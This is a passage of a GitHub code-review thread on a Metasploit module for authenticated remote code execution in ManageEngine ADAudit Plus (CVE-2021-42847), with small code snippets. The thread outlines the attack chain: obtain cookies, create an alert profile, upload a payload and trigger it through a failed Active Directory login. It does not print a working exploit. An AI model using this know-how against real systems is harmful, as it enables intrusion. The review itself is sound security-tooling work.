- If you perform requests that are not in the exact order ADAudit Plus wants to see, your cookies become useless and you have to login again. Unfortunately this seems inevitable in the context of this module where we have to take into account multiple different scenarios that depend on what version of the app is running and what options the user has specified.

For the purposes of this module, and I would expect any other module that would be interacting with the ADAudit Plus API, the information returned by the `api/json/configuredDomainsList` endpoint should be printed only once to the console during a single run, in order to avoid unnecessary noise. However, the call to `api/json/configuredDomainsList` virtually always needs to be made several times during a single run.

The `silent` parameter makes it possible to tell the `adaudit_plus_grab_configured_domains` that we want to interact with  `api/json/configuredDomainsList` solely for the purpose of obtaining a new cookie. That is why it is used to control the execution flow. If we remove this parameter and do not replace it with anything else, the module is going to unnecessarily parse the configured domains and print them to the console several times during a single run. I'm fine with removing or renaming silent, but I'd like to get your thoughts and what we could replace it with?

2023-01-13 16:41 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +    got_cookie = adapcsrf_cookie && adapcsrf_cookie.value.present? ? true : false
@gwillcox-r7 yeah I wrote it like this to account for the possibility where we are able to list the configured domains but we don't actually receive a useable cookie. However, there's no real point to still print the configured domains in that scenario since we can't proceed so I'll move this check up. The exact implementation will depend on your suggestion for how to replace the `silent` parameter (see my other comment).

2023-01-13 16:47 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/login.rb
> +    vprint_status('Attempting to obtain the required cookies for authentication') unless silent
yeah this is related to my comment below

2023-01-13 16:49 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manageengine_adaudit_plus/target_info.rb
> +    domain_aliases = res_body.scan(/<select id="domainName" name="domainName".*?<option value="(.*?)">/m)&.flatten
@gwillcox-r7 yeah I agree it makes more sense to use Nokogiri for this. I'll try and do that next week

2023-01-20 18:43 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +    if res.code == 200 && res.body.include?('domainFullList') && !silent
So I'm happy to keep the `silent` parameter in but I think we need a lot more on the documentation side to note these caveats. The way that I read the `silent` parameter as it is described right now is as a simple on/off toggle switch to suggest that extra information may be returned and that we can toggle it on and off as we please.

This does not properly take into account the situation you are describing here where we need to set things up due to the authentication flow. Your comment `# @param silent [Boolean] Whether to run in silent mode or not (silent mode means fewer print messages)` makes no reference to the authentication part of this workflow or any of the caveats involved.

Therefore what I'd recommend is:
1. Rename the `silent` parameter to something a little bit more descriptive that encompasses the fact that this is tied to login steps as well.
2. Update our documentation to include some notes on the caveats you listed above to at least explain why this is needed for future travelers.
3. Update YARD comments accordingly.

Note: I'm happy to skip over point 1 if needs be, provided that points 2 and 3 include sufficient information and explanation so as to make it so that people do not think that `silent` is a parameter that works similarly to `VERBOSE` and is instead partly tied to the authentication mechanism in play.

2023-01-20 18:49 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/login.rb
> +    vprint_status('Attempting to obtain the required cookies for authentication') unless silent
Update: After reviewing your comment I'm happy to leave this as is provided the points I noted in my comment are resolved with appropriate documentation.

2023-02-02 16:20 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manageengine_adaudit_plus/target_info.rb
> +    domain_aliases = res_body.scan(/<select id="domainName" name="domainName".*?<option value="(.*?)">/m)&.flatten
@gwillcox-r7 I've used nokogiri now

2023-02-02 16:20 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/login.rb
> +    vprint_status('Attempting to obtain the required cookies for authentication') unless silent
I actually ended up printing this always since it's behind the VERBOSE flag anyway

2023-02-02 16:21 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +    if res.code == 200 && res.body.include?('domainFullList') && !silent
@gwillcox-r7 I renamed the param to `only_get_cookie `  and updated the YARD comments. I didn't get around to updating the docs you though, but I can look at that next week.

2023-02-02 16:22 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/login.rb
> +    end
fixed this

2023-02-02 16:22 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +    build = res.body.scan(/"buildNumber":"(.+?)",/)&.flatten&.first
fixed

2023-02-02 16:22 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +    got_cookie = adapcsrf_cookie && adapcsrf_cookie.value.present? ? true : false
fixed and improved the general logic

2023-02-02 16:23 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +  # @return [Array] Array containing a status code (Integer) and status message (String). If the target is ADAudit Plus, the Array also contains the server response
@gwillcox-r7 yeah I've used hashes everywhere in `target_info.rb`  except for one method that only returns an integer

2023-02-02 16:31 UTC, ErikWynter commented
@gwillcox-r7 I finally found time to implement all required changes. Highlights:
- I renamed `silent` to `only_get_cookie ` and updated the YARD docs to explain what this mode is for.
- I improved the logic of the methods with `only_get_cookie` (especially the one for obtaining the configured domains)
- `only_get_cookie ` is no longer used for printing fewer messages. I've moved the required logic for that to the module
- The methods in `target_info.rb` that previously returned an Array of varying contents now return a Hash (I've updated the YARD docs too)
- I used Nokogiri to get around that one regex issue
- I solved the overly loose regex for the build number to add an extra check to make sure the obtained build is 4 digits (otherwise we can't tell if the target is vulnerable)

The only thing left to do when it comes to the library stuff is to update the docs to mention how finicky ADAudit Plus is about cookies and why that requires the `only_get_cookie` param and multiple login attempts per run

Also, I'm now pretty sure we'll have to change the reliability note to state that the first session typically fails. Would still like your take on that though, so let me know once you've had a chance to test it.

2023-02-09 21:58 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manageengine_adaudit_plus/target_info.rb
> +    domain_aliases = res_body.scan(/<select id="domainName" name="domainName".*?<option value="(.*?)">/m)&.flatten
Solution is better but your not checking if `doc` is empty before calling `.css` on it.

2023-02-09 22:00 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manageengine_adaudit_plus/target_info.rb
> +    domain_aliases = res_body.scan(/<select id="domainName" name="domainName".*?<option value="(.*?)">/m)&.flatten
Solution implemented needs some minor adjustments but the main issue here has been resolved. Marking this as resolved for now.

2023-02-09 23:51 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +    build = res.body.scan(/"buildNumber":"(.+?)",/)&.flatten&.first
```suggestion
    build = res.body.scan(/"buildNumber":"(\d{4})",/)&.flatten&.first
```

I get why you split this up however this would prevent potential matches on items that this regex shoudn't be matching on. Otherwise improvements here look good, nice job 👍

2023-02-09 23:52 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +        'message' => "Recieved an invalid build number: #{build}"
Received spelt wrong here, can fix this myself though, just noting for later.

2023-02-10 00:04 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +  # @return [Array] Array containing a status code (Integer) and status message (String). If the target is ADAudit Plus, the Array also contains the server response
Thanks these new changes look great @ErikWynter. We had some issues related to this with another library that I think we worked on for NagiosXI which we ran into some issues with which were noted over at https://github.com/rapid7/metasploit-framework/issues/17606, so this is part of the reason for being a bit more strict on this particular issue this time around.

2023-02-10 00:14 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +    if res.code == 200 && res.body.include?('domainFullList') && !silent
Thanks @ErikWynter much appreciated! New YARD comments and updates look great ❤️

2023-02-10 00:34 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +      next if value == 'ADAuditPlus Authentication'
Would be good to comment why we are skipping this considering your module uses this value.

2023-02-10 00:41 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      target_check_res = target_check_results['res']
Think this is meant to be `server_response`. There is no `res` field in the hash as far as I can tell. This may be a typo from the looks of things.

2023-02-10 23:20 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      target_check_res = target_check_results['res']
Fixed with 10d0d696f8fd04d0916b375d628993222aa51ec6

2023-02-10 23:20 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +        'message' => "Recieved an invalid build number: #{build}"
Fixed with 10d0d696f8fd04d0916b375d628993222aa51ec6

2023-02-10 23:28 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      end
Should probably be breaking this out into seperate failure codes for CONNECTION_FAILED vs UNEXPECTED_REPLY so you can respond with an appropriate failure code. There isn't a good reason that `Failure::Unknown` be used here.

2023-02-10 23:33 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      domain_aliases = domain_alias_results['domain_aliases']
Whilst this is fine for now, if this library gets updated the current logic will only work if we have two status codes: NO_MATCH and success for everything else. Success codes are also assumed to always contain a `domain_aliases` code: we aren't properly checking this actually exists before accessing it.

All of this is just future proofing though so feel free to do what you want with it, but just wanted to point that out.

2023-02-10 23:40 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +        end
What about NO_MATCH which is thrown by `adaudit_plus_grab_configured_domains` which is called by this method? This isn't being caught here.

2023-02-10 23:41 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      end
What about NO_MATCH which is thrown by `adaudit_plus_grab_configured_domains` which is called by this method? This isn't being caught here.

2023-02-10 23:41 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    else
What about NO_MATCH which is thrown by `adaudit_plus_grab_configured_domains` which is called by this method? This isn't being caught here.

2023-02-10 23:43 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    end
This will need to be updated to handle CONNECTION_FAILED and UNEXPECTED_REPLY status codes which are not authentication failures.

2023-02-11 00:28 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +      next if value == 'ADAuditPlus Authentication'
Okay after speaking on Slack I'm still confused by this. You call `adaudit_plus_grab_domain_aliases` to get a list of domain aliases, skipping `ADAuditPlus Authentication` if its included in the server response. All of this is done to set `domain_aliases` so that you can then find the right domain alias to authenticate to, however you also have this code in both of the places you call `adaudit_plus_grab_domain_aliases`:

```
      if auth_domain == 'ADAuditPlus Authentication' || domain_aliases&.include?(auth_domain)
        vprint_status(domain_alias_msg)
        @domain_alias = domain_aliases.first
        print_status("Using configured authentication domain alias #{@domain_alias}.")
```

So `ADAuditPlus Authentication` seems like a valid domain for `adaudit_plus_grab_domain_aliases` to return. Therefore I'm confused why we would to prevent it including this value considering it seems to have no negative effects?

2023-03-09 23:10 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +      next if value == 'ADAuditPlus Authentication'
@gwillcox-r7 on second thought, I actually agree that it's better not to skip `ADAuditPlus Authentication` in this method, because it is a library that may be used by other modules too. 

When I wrote this, I was thinking about it only within the context of the current module, and here `adaudit_plus_grab_domain_aliases` is called only in order to check if there are any active directory domains configured that we can use in order to eventually trigger the payload via a login attempt using invalid active directory credentials. This is why I thought the method should only return valid active directory domains. While  `ADAuditPlus Authentication` can be used to authenticate to ADAudit Plus, it cannot be used to trigger the payload, hence my approach.

However, since it is a library I agree that it should return all configured authentication domains, and then the calling method can be used to determine what to do when only `ADAuditPlus Authentication` is configured. This is exactly what I have done now, by adding a check in the module (in both places where this method is called). I also added a few comments to clarify what the module is doing and why. I think this should clarify things quite a bit, but let me know if you have any final questions.

2023-03-09 23:23 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      end
good catch, fixed

2023-03-09 23:24 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +    build = res.body.scan(/"buildNumber":"(.+?)",/)&.flatten&.first
makes sense, added this now

2023-03-09 23:24 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +    if res.code == 200 && res.body.include?('domainFullList') && !silent
added a section about this to the docs now

2023-03-09 23:29 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      domain_aliases = domain_alias_results['domain_aliases']
@gwillcox-r7 very good point. I expanded the case statement now so that it would still work if additional status codes are returned in the future. I implemented the same logic elsewhere too.

2023-03-09 23:35 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +        end
nice catch, added this now

2023-03-09 23:36 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      end
added

2023-03-09 23:38 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    else
here is it is covered by the `else` clause, which I think should be fine?

2023-03-09 23:41 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    end
agreed. I expanded the case statement now

2023-03-10 00:24 UTC, ErikWynter commented
@gwillcox-r7 I finally got around to this. Gotta say thanks for the additional review, because you flagged several important issues. My latest commits should cover all of those (I think), including the docs. I haven't retested the changes against a target since I figured you'd run final tests before landing it anyway. Let me know if there are any final issues, but definitely feel free to fix anything minor as you see fit.

2023-03-15 16:29 UTC, gwillcox-r7 commented
> @gwillcox-r7 I finally got around to this. Gotta say thanks for the additional review, because you flagged several important issues. My latest commits should cover all of those (I think), including the docs. I haven't retested the changes against a target since I figured you'd run final tests before landing it anyway. Let me know if there are any final issues, but definitely feel free to fix anything minor as you see fit.
> 
> Btw I left all conversations open on purpose so you can go through them one by one as you review the changes

Thanks much appreciated @ErikWynter will review this now!

2023-03-15 16:51 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +    if res.code == 200 && res.body.include?('domainFullList') && !silent
Updated docs look good, marking this as resolved!

2023-03-15 18:21 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +    build = res.body.scan(/"buildNumber":"(.+?)",/)&.flatten&.first
Verified fix has been applied, marking resolved.

2023-03-15 20:48 UTC, gwillcox-r7 requested changes
I'm hitting the max comment limit that I want to do in a single review to avoid overwhelm. There are a bunch of instances of issues related to your new `adaudit_plus_status::` error codes and not properly accounting for all of them, or raising the wrong exception in `fail_with`. Please review all of these instances where you are using such behavior along with my comments and try to fix this up, then we can take another run through the code.

2023-03-15 20:48 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    else
You still have NO_ACCESS which is not being handled here as an error code?

2023-03-15 20:48 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    else
Actually upon reviewing this your current code as it is written will fall through to this `print_warning` line if the code is SUCCESS. 

My concern was that if we add more error codes in the future, your current message assumes that any unknown error code is after a connection has already been made and we have received a response, which may not be the case. We should instead just state that we got an unknown error code and leave it at that vs making assumptions which may or may not be true.

2023-03-15 20:48 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      end
I don't think this was resolved correctly. `NO_MATCH` appears to be being thrown when no configured Active Directory domains are found, or when no build number was obtained. I'd recommend two things:

1. Break these down into two separate errors. They are unrelated and grouping them like this causes confusion and may lead to errors in the code.
2. `Failure::NoAccess` doesn't make sense in this case. In the first case of no configured Active Directory domains its a `Failure::NotVulnerable` error I'm guessing due to the fact that no domains have been configured we can use for exploitation (unless you can use the domain that gets set up as part of the install for exploitation?) For the second case, aka no build number obtained, it should be `Failure::UnexpectedReply` as you were expecting a build number to be returned but couldn't find one.

2023-03-15 20:48 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +        end
See previous comment about using `NO_MATCH` with `Failure::NoAccess`. This also applies here.

2023-03-15 20:48 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +        'status' => adaudit_plus_status::NO_MATCH,
This should really be its own error code such as `adaudit_plus_status::NO_BUILD_NUM`

2023-03-15 20:48 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      print_warning('The module will proceed, but exploitation may fail.')
Presently this would also be the case if you couldn't find the build number. See my earlier point about splitting these error codes up. This is a good example of error codes being used for multiple purposes and then the code making assumptions as a result that don't hold.

2023-03-15 20:48 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    end
Is this necessarily true? If you can't find the build number then does this mean the product is actually what you think it is? I'd imagine this would not be the case? In the case of the domains not being available I'd say this may be safe to assume if you have other responses that indicate the target is a ManageEngine target but in the case of the build number I'd imagine that this is part of the check to see if the target is a ManageEngine target in which case this code doesn't really make sense to me? 😕

2023-03-15 20:48 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +        print_warning('The module will proceed, but exploitation may fail.')
See earlier point here as well, this will also need fixing.

2023-03-15 20:48 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      delete_alert(login_results['adapcsrf_cookie'])
Confused on this, if the target has no configured domains we shouldn't be proceeding on the basis that its exploitable since elsewhere in your code your assume its not exploitable. Similarly if the build number can't be found I would think you would stop exploiting since you can't confirm the target is what you think it is?

2023-03-15 20:48 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      end
This needs further fixing, see my comments.

2023-03-15 20:48 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      domain_aliases = domain_alias_results['domain_aliases']
See comments earlier, this isn't fixed yet.

2023-03-16 00:16 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      end
fixed in line with your comments

2023-03-16 00:17 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      domain_aliases = domain_alias_results['domain_aliases']
sorry I missed that one last time. added a check to make sure `domain_aliases` exists and is not empty

2023-03-16 00:22 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +        end
actually, it can never return `NO_MATCH` (renamed to `NO_DOMAINS` in this case because the login method is called with the 4th parameter set to `true`. This is the `only_get_cookie` parameter for `adaudit_plus_grab_configured_domains` and if that is enabled, the method will always return before it can hit the code where `NO_DOMAINS` can be returned.

2023-03-16 00:24 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      end
Agreed. I replaced `NO_MATCH` with `NO_DOMAINS` and `NO_BUILD_NUMBER` and used the failure statutes you suggested

2023-03-16 00:26 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    else
good point. I added a case for `SUCCESS` and mentioned the unknown error code for the else statement

2023-03-16 00:28 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +        fail_with(Failure::Unknown, login_msg)
makes sense. I tried to fix this consistently now. if there's any incorrect ones left, feel free to change those accordingly

2023-03-16 00:29 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    else
added this now

2023-03-16 00:30 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +        'status' => adaudit_plus_status::NO_MATCH,
agreed, fixed

2023-03-16 00:32 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    end
agreed,. since we don't know what we're dealing with here, I used `CheckCode::Unknown` now, as it seems most appropriate.

2023-03-16 00:33 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      delete_alert(login_results['adapcsrf_cookie'])
agreed. I fixed it so it doesn't try and perform cleanup in this case as that makes no sense

2023-03-16 00:38 UTC, ErikWynter commented
@gwillcox-r7 thanks for the suggestions! I have tried to consistently implement the changes you suggested by splitting `NO_MATCH` up instead `NO_DOMAINS` and `NO_BUILD_NUMBER` and using appropriate `Failure` status messages everywhere. If I missed anything, feel free to fix it in line with the rest. If there's still something you're not sure about, let me know :)

2023-03-20 19:44 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> -      when adaudit_plus_status::NO_ACCESS, adaudit_plus_status::NO_MATCH
Might want to double check this logic....

2023-03-20 20:15 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +        fail_with(Failure::Unknown, domain_alias_msg)
Idk what I was thinking here and updates look good. Marking resolved.

2023-03-20 20:28 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    when adaudit_plus_status::SUCCESS
Missing NO_DOMAINS here.

2023-03-20 20:28 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    when adaudit_plus_status::NO_ACCESS
Missing NO_DOMAINS here

2023-03-20 20:28 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      when adaudit_plus_status::SUCCESS
Missing NO_DOMAINS here.

2023-03-20 20:28 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +        when adaudit_plus_status::SUCCESS
Missing NO_DOMAINS here

2023-03-20 20:28 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      # this covers: adaudit_plus_status::CONNECTION_FAILED, adaudit_plus_status::UNEXPECTED_REPLY and adaudit_plus_status::NO_BUILD_NUMBER
Probably best not to tie this in to specific items since these may change over time.

2023-03-20 20:28 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      end
Thanks @ErikWynter looks a lot better now!

2023-03-20 20:33 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +        when adaudit_plus_status::SUCCESS
Mobile now but iirc correctly, the login method cannot possibly return no_domains here because the fourth parameter is set to true, in which case the method to get the configured domains always finishes early, before the domains are checked. I left a comment about this elsewhere I think

2023-03-20 20:35 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +        end
See previous comment. No_domains cannot possibly be returned because of the 4th parameter being set to true in the call to the login method.

2023-03-20 20:40 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    end
Assuming this moved to line 409, but here is my response from review:

Don't use CheckCode::Unknown as a catchall for cases you know the failure reason of. This seems to be a repeat of earlier discussions. CheckCode::Unknown should only be used when you legitimately don't know why something happened such as unexpected application behavior with no logical reason behind why it might be occurring. If you know the reason, such as connection dropping, unexpected responses, or something else, then you shouldn't be using CheckCode::Unknown.

As it stands right now this will catch NO_BUILD_NUMBER, UNEXPECTED_REPLY and CONNECTION_FAILED as noted above, and treat them as though we don't know what caused the error when we really do.

2023-03-20 20:43 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +        when adaudit_plus_status::SUCCESS
Double checked this now: See lines 135-148 of `adaudit_plus_grab_configured_domains` in `target_info.rb`. The method always returns via one of those two checks if  `only_get_cookie` is true, which is the case when the login method is called like this. In that case, `adaudit_plus_grab_configured_domains` can only return 4 possible status codes: connection failed, unexpected reply, no access and success. All of those are caught here.

2023-03-20 20:45 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      # this covers: adaudit_plus_status::CONNECTION_FAILED, adaudit_plus_status::UNEXPECTED_REPLY and adaudit_plus_status::NO_BUILD_NUMBER
Wdym? Would you prefer not to include the comment mentioning the specific status codes?

2023-03-20 20:46 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    when adaudit_plus_status::SUCCESS
See my other comment. The login method is called with the fourth param set to true, in which case it cannot possibly return no_domains

2023-03-20 20:47 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    when adaudit_plus_status::NO_ACCESS
No_domains can't be returned here, see my other comments

2023-03-20 20:53 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +  #   of Strings for the configured domain aliases.
So upon further review this key isn't optional. It will always exist however it may be empty. Should update the comment to reflect this.

2023-03-20 20:55 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      @domain_alias = domain_aliases.first
Should check this isn't `nil` as doing `[].first` will result in `@domain_alias` being set to `nil`.

2023-03-20 21:08 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      domain_aliases = domain_alias_results['domain_aliases']
As it turns out in your current code `domain_aliases` can never be empty. However you do have some code that still operates on things a bit wrong. I'll raise some separate comments for those, but issue here is fixed.

2023-03-20 21:18 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +        end
Fair point, thanks for pointing that out.

2023-03-20 21:20 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +        when adaudit_plus_status::SUCCESS
Yep resolving this, misunderstanding on my part.

2023-03-22 07:54 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    end
as per our discussion on slack, it seems that you were thinking of `Failure::` here because `CheckCode::` doesn't really provide tailored options to distinguish between these status codes. As you mentioned, `CheckCode::Unknown` is appropriate when we don't know if an app is vulnerable or not, which is the case for these three status codes.

2023-03-22 08:08 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    end
yup that was an oversight. fixing this

2023-03-22 08:09 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      fail_with(Failure::Unknown, 'Failed to create an alert profile via /api/json/config/alertprofiles/save')
fixed

2023-03-22 08:09 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      fail_with(Failure::Unknown, 'Connection failed')
fixed

2023-03-22 08:09 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      fail_with(Failure::Unknown, 'Failed to upload the payload.')
fixed

2023-03-22 08:12 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      # this covers: adaudit_plus_status::CONNECTION_FAILED, adaudit_plus_status::UNEXPECTED_REPLY and adaudit_plus_status::NO_BUILD_NUMBER
gotcha, fixed this now

2023-03-22 08:23 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +  #   of Strings for the configured domain aliases.
@gwillcox-r7 I'm confused what you meant here. If the return status is `NO_DOMAINS`, the `domain_aliases` key was never present:
```
    no_domains_response = {
      'status' => adaudit_plus_status::NO_DOMAINS,
      'message' => 'No configured Active Directory domains were found.'
    }

    return no_domains_response if css_dom_name.blank?
```
However, since it would be a bit more consistent to include it, I simply did that for all cases now and updated the comment to reflect that it this key will simply be empty if no domain aliases are found.

2023-03-22 08:30 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +      end
agreed. I fixed this now by adding a check for when the status code is `SUCCESS`:
```
      when adaudit_plus_status::SUCCESS
        # make sure we actually have a domain alias, otherwise the target is not vulnerable
        if domain_alias_results['domain_aliases'].blank?
          fail_with(Failure::NotVulnerable, 'Failed to verify if any Active Directory domains are configured on the target.')
        end
```

2023-03-22 20:15 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +    got_cookie = adapcsrf_cookie && adapcsrf_cookie.value.present? ? true : false
@ErikWynter Sorry for the delay on this, need to sit down and do a longer review of all the code again at some point. This will be part of this, but leaving this point open until said review occurs to remind myself.

2023-03-22 20:20 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +        return CheckCode::Unknown("The target is ADAudit Plus #{build_version} but the connection failed when checking for the CVE-2021-42847 endpoint")
Should this not be `CheckCode::Detected` as you know the service, aka ADAudit Plus, is running but you don't know if the vulnerable endpoint is available or not?

2023-03-22 20:20 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    end
Agreed this was a confusion on my part between the two. Thanks for pointing this out. Marking this as resolved.

2023-03-22 20:22 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    end
Verified fixed, thanks for addressing these!

2023-03-22 20:40 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +  #   and a 'domain_aliases' key, which is used to hold an Array
```suggestion
  #   and a 'domain_aliases' key, which holds an Array
```

